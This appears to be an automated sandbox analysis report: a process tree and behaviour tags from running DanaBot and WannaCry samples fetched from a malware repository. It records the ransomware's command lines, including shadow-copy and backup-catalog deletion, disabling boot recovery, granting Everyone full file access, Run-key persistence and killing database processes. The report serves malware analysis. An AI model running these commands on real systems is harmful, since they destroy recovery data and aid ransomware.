PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 4716 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 4716 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 3148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 3148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 3148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 3148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 3148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 3148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 3148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 3148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 3148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 3148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 3148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 3148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 3148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 3148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 3148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 3148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 3148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 3148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 3148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 3148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/Da2dalus/The-MALWARE-Repo/blob/master/Virus/WinNuke.98.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ff9026f46f8,0x7ff9026f4708,0x7ff9026f4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,3733991581594399755,9190074552865191652,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,3733991581594399755,9190074552865191652,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2056,3733991581594399755,9190074552865191652,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,3733991581594399755,9190074552865191652,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,3733991581594399755,9190074552865191652,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,3733991581594399755,9190074552865191652,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6124 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,3733991581594399755,9190074552865191652,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6124 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff6633f5460,0x7ff6633f5470,0x7ff6633f5480

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,3733991581594399755,9190074552865191652,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,3733991581594399755,9190074552865191652,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,3733991581594399755,9190074552865191652,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6252 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,3733991581594399755,9190074552865191652,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,3733991581594399755,9190074552865191652,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5864 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2056,3733991581594399755,9190074552865191652,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5840 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,3733991581594399755,9190074552865191652,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=252 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,3733991581594399755,9190074552865191652,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6216 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2056,3733991581594399755,9190074552865191652,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7012 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2056,3733991581594399755,9190074552865191652,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6132 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Downloads\DanaBot.exe

"C:\Users\Admin\Downloads\DanaBot.exe"

C:\Windows\SysWOW64\regsvr32.exe

C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\DOWNLO~1\DanaBot.dll f1 C:\Users\Admin\DOWNLO~1\DanaBot.exe@3408

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3408 -ip 3408

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3408 -s 468

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\DOWNLO~1\DanaBot.dll,f0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,3733991581594399755,9190074552865191652,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6472 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2056,3733991581594399755,9190074552865191652,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6444 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2056,3733991581594399755,9190074552865191652,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6908 /prefetch:8

C:\Users\Admin\Downloads\WannaCry.exe

"C:\Users\Admin\Downloads\WannaCry.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 307591731173408.bat

C:\Windows\SysWOW64\cscript.exe

cscript //nologo c.vbs

C:\Users\Admin\Downloads\!WannaDecryptor!.exe

!WannaDecryptor!.exe f

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im MSExchange*

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Microsoft.Exchange.*

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im sqlserver.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im sqlwriter.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,3733991581594399755,9190074552865191652,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2988 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2056,3733991581594399755,9190074552865191652,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2740 /prefetch:8

C:\Users\Admin\Downloads\!WannaDecryptor!.exe

!WannaDecryptor!.exe c

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c start /b !WannaDecryptor!.exe v

C:\Users\Admin\Downloads\!WannaDecryptor!.exe

!WannaDecryptor!.exe v

C:\Users\Admin\Downloads\!WannaDecryptor!.exe

!WannaDecryptor!.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2056,3733991581594399755,9190074552865191652,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1688 /prefetch:8

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,3733991581594399755,9190074552865191652,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2584 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,3733991581594399755,9190074552865191652,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6296 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,3733991581594399755,9190074552865191652,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2056,3733991581594399755,9190074552865191652,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5488 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2056,3733991581594399755,9190074552865191652,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6168 /prefetch:8

C:\Users\Admin\Downloads\WannaCrypt0r (1).exe

"C:\Users\Admin\Downloads\WannaCrypt0r (1).exe"

C:\Windows\SysWOW64\attrib.exe

attrib +h .

C:\Windows\SysWOW64\icacls.exe

icacls . /grant Everyone:F /T /C /Q

C:\Users\Admin\Downloads\taskdl.exe

taskdl.exe

C:\Users\Admin\Downloads\taskse.exe

taskse.exe C:\Users\Admin\Downloads\@[email protected]

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "pdyantnatxy168" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "pdyantnatxy168" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 77361731173462.bat

C:\Windows\SysWOW64\attrib.exe

attrib +h +s F:\$RECYCLE

C:\Windows\SysWOW64\cscript.exe

cscript.exe //nologo m.vbs

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c start /b @[email protected] vs

C:\Users\Admin\Downloads\@[email protected]

@[email protected] vs

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Users\Admin\Downloads\taskdl.exe

taskdl.exe

C:\Users\Admin\Downloads\taskse.exe

taskse.exe C:\Users\Admin\Downloads\@[email protected]

C:\Users\Admin\Downloads\@[email protected]

@[email protected]

C:\Users\Admin\Downloads\taskdl.exe

taskdl.exe

C:\Users\Admin\Downloads\taskse.exe

taskse.exe C:\Users\Admin\Downloads\@[email protected]

C:\Users\Admin\Downloads\@[email protected]

@[email protected]

C:\Windows\SysWOW64\taskkill.exe

taskkill.exe /f /im Microsoft.Exchange.*

C:\Windows\SysWOW64\taskkill.exe

taskkill.exe /f /im MSExchange*

C:\Windows\SysWOW64\taskkill.exe

taskkill.exe /f /im sqlserver.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill.exe /f /im sqlwriter.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill.exe /f /im mysqld.exe

C:\Windows\SysWOW64\attrib.exe

attrib +h +s F:\$RECYCLE

C:\Users\Admin\Downloads\taskdl.exe

taskdl.exe

C:\Users\Admin\Downloads\taskse.exe

taskse.exe C:\Users\Admin\Downloads\@[email protected]

C:\Users\Admin\Downloads\@[email protected]

@[email protected]

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1836 -parentBuildID 20240401114208 -prefsHandle 1860 -prefMapHandle 1648 -prefsLen 21733 -prefMapSize 243020 -appDir "C:\Program Files\Mozilla Firefox\browser" - {574c49b9-326d-417b-bafd-a3e9aae62b1a} 5432 "\\.\pipe\gecko-crash-server-pipe.5432" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2440 -parentBuildID 20240401114208 -prefsHandle 2432 -prefMapHandle 2420 -prefsLen 21733 -prefMapSize 243020 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c900c550-c998-4659-a667-850562143b6d} 5432 "\\.\pipe\gecko-crash-server-pipe.5432" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3540 -childID 1 -isForBrowser -prefsHandle 3532 -prefMapHandle 3528 -prefsLen 21286 -prefMapSize 243020 -jsInitHandle 1208 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e14dfb0-17bb-435f-9708-6190fb7106a4} 5432 "\\.\pipe\gecko-crash-server-pipe.5432" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3984 -childID 2 -isForBrowser -prefsHandle 4224 -prefMapHandle 3996 -prefsLen 22578 -prefMapSize 243020 -jsInitHandle 1208 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {86a7aadb-5edb-4b92-bb07-32aabda914e5} 5432 "\\.\pipe\gecko-crash-server-pipe.5432" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4456 -childID 3 -isForBrowser -prefsHandle 3884 -prefMapHandle 4016 -prefsLen 29251 -prefMapSize 243020 -jsInitHandle 1208 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c305a412-7c42-4c50-9069-73866a609651} 5432 "\\.\pipe\gecko-crash-server-pipe.5432" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5124 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 5192 -prefMapHandle 5184 -prefsLen 29759 -prefMapSize 243020 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {42b69e99-882f-49b1-879f-cbf41d38ad95} 5432 "\\.\pipe\gecko-crash-server-pipe.5432" utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4660 -parentBuildID 20240401114208 -prefsHandle 5180 -prefMapHandle 3980 -prefsLen 29759 -prefMapSize 243020 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3063174c-af69-458d-93a0-d5b15118da13} 5432 "\\.\pipe\gecko-crash-server-pipe.5432" rdd

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3696 -childID 4 -isForBrowser -prefsHandle 3640 -prefMapHandle 3768 -prefsLen 28332 -prefMapSize 243020 -jsInitHandle 1208 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0ef94dac-7270-4abb-ab90-ec2edfc878b0} 5432 "\\.\pipe\gecko-crash-server-pipe.5432" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3824 -childID 5 -isForBrowser -prefsHandle 3544 -prefMapHandle 3652 -prefsLen 28332 -prefMapSize 243020 -jsInitHandle 1208 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4343c771-35af-435c-9028-9e0a2cab2a09} 5432 "\\.\pipe\gecko-crash-server-pipe.5432" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5880 -childID 6 -isForBrowser -prefsHandle 5980 -prefMapHandle 5984 -prefsLen 28332 -prefMapSize 243020 -jsInitHandle 1208 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a01883dc-b793-4052-8245-0dd0efeda4d0} 5432 "\\.\pipe\gecko-crash-server-pipe.5432" tab

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x144,0x148,0x14c,0x120,0x150,0x7ff9026f46f8,0x7ff9026f4708,0x7ff9026f4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

